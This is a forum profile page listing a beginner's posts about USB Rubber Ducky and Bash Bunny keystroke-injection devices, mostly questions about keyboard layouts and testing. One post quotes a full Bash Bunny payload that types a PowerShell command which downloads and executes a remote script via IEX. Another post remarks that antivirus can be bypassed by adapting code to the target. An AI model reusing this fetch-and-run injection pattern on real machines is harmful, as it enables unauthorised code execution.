Jump to content

FredHilbert

Active Members
  • Posts

    15
  • Joined

  • Last visited

Everything posted by FredHilbert

  1. hello, I can't find in the doc. How can I check my firmware version ?
  2. No sorry. Never find how to set correctly for our French-Switzerland keyboard layout.
  3. Thank you for your answer. But where in the payload ? I've tried in the RickRoll prank payload at different location but the Powershell command is still writing in US layout. # Uses a HID/Ethernet Attack to run a RickRoll powershell script from Lee Holmes # Blue...............Running Powershell / Waiting for WebServer to start # White..............WebServer started starting the rickroll # Green..............RickRoll Started, Safe to pull LED B 200 ATTACKMODE HID DUCKY_LANG CH Q GUI r Q STRING "powershell \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet){ IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/RR.ps1');exit}}\"" Q DELAY 300 Q ENTER ATTACKMODE RNDIS_ETHERNET source bunny_helpers.sh payload_dir=/root/udisk/payloads/$SWITCH_POSITION cd $payload_dir LED R G B 200 iptables -A OUTPUT -p udp --dport 53 -j DROP python -m SimpleHTTPServer 80 & pid=$! while ! nc -z localhost 80; do sleep 0.2; done sleep 3 LED G 200 kill -9 $pid exit
  4. Hi Blix I tried to install CH and BE keyboard. But when I put Duckyinstall in Switch1 folder and execute it, nothing append. Can I launch install.sh manually direct from ssh console ? (sorry for my english) Thank you.
  5. Hi Ziriolo, Of course Ducky works on W10. And to bypass the antivirus, you must first know which antivirus is installed on target machine, then adapt your code.
  6. Hello everyone, First I have to say that English is not my mother tongue. So, sorry for my poor English skills. I'm a beginner with coding. And I find it strange having to remove and replace the SD card every time when I make a test or when I'm trying to debug. Is there a solution to emulate USB Ducky's behavior in a virtual machine. If not, Is this is something possible in your opinion ? Thank you for your advice.
  7. After F11 and a long delay you can add "ENTER" for a fake BOSD :-)
  8. Of course I believe you. In your first answer I just thought you were joking me because I am a assumed newbie (in coding). Anyway, Ducky is a great product. and I am mpatient to find out more. I received the ducky only this morning and I have not had much time to play with. Again, thank you for taking the time to answer me.
  9. Sorry if I expressed myself badly. I have a gap in English... It was a joke in the joke :-) Sorry for misunderstanding I thought there was a way to test the command line without plug/unplug zhe SD card each time. For exemple commande line like : GUI or CONTROLE ESCAPE or CTRL-SHIFT ENTER or ALT y there is no way to test somewhere? Anyway thank you for taking the time to answer me.
  10. Hello Sud0nick, thank you for your answer. If this is an "anti newbie" joke that's not funny :-) There must be a way to test my code in a vm. Or I'm wrong?
  11. Hello everyone, I'm a beginner with coding. What's the best way to test my code before inject it on my USB ducky ? My goal is to not have to remove and replace the SD card when I make a test or when I'm trying to debug. Sorry for my poor english :-)
×
×
  • Create New...